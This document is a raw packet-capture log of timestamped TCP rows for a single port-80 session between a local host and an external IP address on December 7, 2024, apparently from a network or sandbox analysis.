Dec 7, 2024 15:47:46.112754107 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.112819910 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.112869024 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.116652012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.116754055 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.116820097 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.120578051 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.120707035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.120760918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.124629974 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.124665022 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.124728918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.128403902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.128459930 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.128495932 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.128537893 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.132328987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.132385969 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.132473946 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.132529974 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.136244059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.136301041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.136332035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.136373997 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.140131950 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.140192032 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.140233040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.140402079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.144036055 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.144088984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.144151926 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.144195080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.147981882 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.148046970 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.148169994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.148219109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.152065039 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.152117014 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.152118921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.152164936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.155812025 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.155869007 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.155898094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.155977011 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.159694910 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.159751892 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.159795046 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.159838915 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.163630962 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.163681984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.163742065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.163816929 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.167553902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.167606115 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.167634964 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.167680979 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.171571970 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.171632051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.171696901 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.171750069 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.175420046 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.175472975 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.175517082 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.175561905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.179363966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.179428101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.179433107 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.179491997 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.183264971 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.183334112 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.183351040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.183401108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.187103033 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.187160969 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.187222004 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.187273026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.191091061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.191145897 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.191207886 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.191268921 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.194922924 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.194978952 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.195050001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.195096016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.198879004 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.198930025 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.198997974 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.199064016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.260833025 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.260946989 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.261075974 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.262295961 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.262406111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.262465954 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.265398026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.265472889 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.265551090 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.265594006 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.268475056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.268610001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.268660069 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.271725893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.271836042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.271892071 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.274575949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.274652958 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.274707079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.277642012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.277700901 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.277839899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.277890921 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.280662060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.280725956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.280736923 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.280785084 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.283570051 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.283684969 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.283742905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.286443949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.286521912 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.286578894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.289278030 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.289339066 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.291309118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.293226004 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.293281078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.293400049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.293448925 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.296190023 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.296353102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.296427011 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.298930883 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.298944950 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.299004078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.301739931 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.301753998 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.301800013 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.302875042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.302970886 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.303023100 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.307007074 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.307020903 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.307086945 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.309204102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.309273958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.309353113 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.309398890 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.311753035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.311908007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.311960936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.314408064 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.314420938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.314479113 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.316893101 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.316905975 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.316941023 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.319453955 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.319591045 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.319644928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.321145058 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.321156979 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.321191072 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.321227074 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.323260069 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.323394060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.323446035 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.325726032 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.325783014 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.325822115 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.325861931 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.329979897 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.329992056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.330053091 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.331711054 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.331722021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.331788063 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.331811905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.331855059 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.331969976 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.332016945 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.333194017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.333249092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.333283901 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.333343983 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.334496021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.334635019 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.334688902 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.335860968 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.335918903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.335999966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.336050987 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.337207079 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.337255955 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.337316990 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.337359905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.338572979 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.338684082 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.338737965 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.339912891 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.339962006 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.340018988 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.340064049 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.341244936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.341290951 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.341583967 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.341634035 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.342619896 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.342663050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.342720032 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.343949080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.344079018 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.344182014 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.345292091 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.345340967 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.345354080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.345408916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.345459938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.346652985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.346729994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.346765041 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.346807957 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.348021984 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.348066092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.348092079 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.348263979 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.349363089 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.349452019 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.349484921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.349560976 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.350692987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.350737095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.350821972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.350860119 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.352061033 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.352118015 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.352207899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.352251053 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.353413105 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.353473902 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.353496075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.353537083 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.354792118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.354841948 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.354877949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.354919910 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.356136084 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.356236935 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.356250048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.356287003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.357479095 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.357533932 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.357557058 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.357664108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.358815908 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.358863115 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.358918905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.358994961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.360188007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.360233068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.360305071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.360358953 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.361500978 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.361555099 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.361615896 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.361764908 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.362860918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.362912893 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.362940073 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.362987041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.452764988 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.452833891 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.452879906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.452994108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.453403950 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.453457117 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.453577042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.453619003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.454575062 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.454602957 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.454658031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.455945015 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.455993891 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.456013918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.456053972 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.457128048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.457226992 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.457289934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.458519936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.458566904 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.458703041 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.459001064 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.459851027 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.459935904 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.459983110 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.461185932 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.461235046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.461364985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.461441040 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.549969912 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.550013065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.550035000 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.550086021 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.550513983 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.550573111 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.550600052 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.550731897 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.551843882 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.551903963 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.551933050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.551976919 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.553188086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.553245068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.553347111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.553451061 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.554512024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.554600000 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.554666042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.554709911 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.555898905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.556025982 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.556082010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.557265043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.557336092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.557365894 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.557410002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.558634996 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.558690071 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.558708906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.558773994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.559995890 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.560051918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.560127020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.560234070 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.561321020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.561376095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.561436892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.561481953 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.562693119 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.562721014 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.562737942 CET	49706	80	192.168.2.5	107.175.113.196
